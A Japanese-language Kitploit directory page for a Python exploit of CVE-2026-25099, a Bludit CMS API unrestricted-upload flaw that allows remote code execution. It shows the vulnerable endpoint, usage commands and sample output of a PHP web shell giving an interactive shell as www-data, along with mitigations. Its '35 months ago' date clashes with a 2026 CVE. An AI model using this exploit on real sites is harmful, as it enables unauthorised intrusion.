Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/yahiahamza/cve-2026-25099
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubyahiahamza/cve-2026-25099

CVE-2026-25099

Python製のエクスプロイトで、Bludit CMS APIの無制限ファイルアップロードを悪用してリモートコード実行を実現し、認可されたテスト用にコマンド実行と対話型シェルを提供します。

リポジトリを見る
35ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-25099 - Bludit CMS API 無制限ファイルアップロードによるRCE

説明

Bludit CMS 3.18.4 より前のバージョンでは、有効なAPIトークンを持つ認証済み攻撃者が、POST /api/files/<page-key> エンドポイントを介して任意のタイプおよび拡張子のファイルをアップロードできます。uploadFile() 関数はファイル拡張子やコンテンツの検証を一切行わないため、PHPウェブシェルをアップロードして www-data として実行することが可能です。

影響を受けるバージョン

  • 脆弱性あり: Bludit < 3.18.4
  • 修正済み: Bludit 3.18.4
  • 前提条件: 有効なAPIトークン(管理パネルの プラグイン → API で確認可能)

使用方法

root@kitploit:~
# 単一コマンド実行
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN" -c "id"

# 対話型シェル
python3 CVE-2026-25099.py -u http://target -t "API_TOKEN"

出力例

root@kitploit:~
[*] CVE-2026-25099 - Bludit CMS API ファイルアップロードによるRCE
[*] ターゲット: http://target
[*] ページキーを取得中...
[+] ページキー: create-your-own-content
[*] ウェブシェルをアップロード中...
[+] シェルがアップロードされました: http://target/bl-content/uploads/pages/create-your-own-content/abcdefgh.php
[*] RCEを検証中...
[+] RCE確認: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] 対話型シェル(終了するには 'exit' と入力)

shell> whoami
www-data
shell> grep BLUDIT_VERSION /var/www/html/bl-kernel/boot/init.php
define('BLUDIT_VERSION', '3.18.2');

スクリーンショット

PoC実行

対策

  • Bludit 3.18.4 以降に更新する
  • 不要な場合はAPIプラグインを無効化する
  • /bl-content/uploads/ 内の予期しないPHPファイルを監視する

参考情報

  • MITRE上のCVE-2026-25099
  • 技術分析 - yh.do

作成者

Yahia Hamza - https://yh.do

免責事項

このツールは、許可されたセキュリティテストおよび教育目的のみで提供されています。責任を持って、テストする許可を得たシステムに対してのみ使用してください。

ツールをダウンロード